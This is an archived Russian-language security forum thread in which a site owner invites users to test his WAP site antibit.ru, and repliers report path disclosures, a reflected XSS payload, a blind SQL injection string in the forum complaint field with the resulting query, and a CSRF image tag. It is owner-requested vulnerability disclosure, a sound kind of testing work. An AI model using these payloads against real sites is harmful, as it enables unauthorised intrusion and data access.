PDA

Просмотр полной версии : ВАП сайт. Нужна проверка.

azote
14.11.2009, 00:37
Cайт antibit.ru
Проверьте пожалуйста, тем кто чем-нибудь поможет, буду очень и весьма признателен.
Картинка ачата стоит.

Тестовый Аккаунт:
login: antichat
pass: antichat


Хотелось бы проверить:


http://antibit.ru/forum/ (особенно при добавлении файла в тему)
http://antibit.ru/add/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
http://antibit.ru/files
S00pY
14.11.2009, 15:25
antibit.ru/index.php?do=files&name[]=Din
раскрытие пути
------------------
index.php?do=files&name=Din
пасив xss в поиске
XenkoK
15.11.2009, 02:21
Cпасибо, убрал.


А можно поподробней узнать где тут Хss ?


гг перейди: http://antibit.ru/index.php?do=files&name=Din

и в поиске напишы: "><script>alert()</script>
azote
22.12.2009, 21:48
Акутально. Картинка ачата стоит. Тестовый акк дал. В шапке указал модули которые хотелось бы проверить.
m0Hze
23.12.2009, 01:20
http://antibit.ru/index.php?do=members&orderby[]=warn_up
SnooPy
03.01.2010, 18:54
http://antibit.ru/members/ в поиске кавычку отфильтруй!
azote
22.04.2010, 23:35
Хотелось бы првоерить:

http://antibit.ru/forum/
http://antibit.ru/members/
http://antibit.ru/kontakts/
http://antibit.ru/ignors/
life_glider
23.04.2010, 04:57
SQL-injection в insert-е, вроде как слепая.
Уязвимо поле причина жалобы в форуме когда нажимаем пожаловаться.
http://antibit.ru/forum/topic_101/report/2
вставил
123','123338', 'system', '1271983556', 'no', VERSION())/*
прошло
123','123338', 'system', '1271983556', 'no', VERSION()')/*
обана
INSERT INTO dle_pm (subj, text, user, user_from, date, pm_read, folder) values ('Жалоба на сообщение форума.', 'Данную жалобу вам отправил antichat<br>
Текст жалобы: 123','123338', 'system', '1271983556', 'no', VERSION()')/*<br>
Тема: <a href="http://antibit.ru/index.php?do=forum&showtopic=255">Перейти в тему</a><br>
ID сообщения: 2', 338, 'system', '1271983702', 'no', 'inbox')

Раскрытие путей:
Warning: socket_write(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 239 Warning: socket_close(): 21 is not a valid Socket resource in /home/a/antibitru/public_html/engine/classes/icq.class.php on line 294
http://antibit.ru/icq_send/send/359
CSRF:
Добавляем В ИГНОР:
<img src="http://antibit.ru/ignors/add/358" alt="" />
azote
28.05.2010, 16:57
Обновил шапку, проверьте пожалуйста.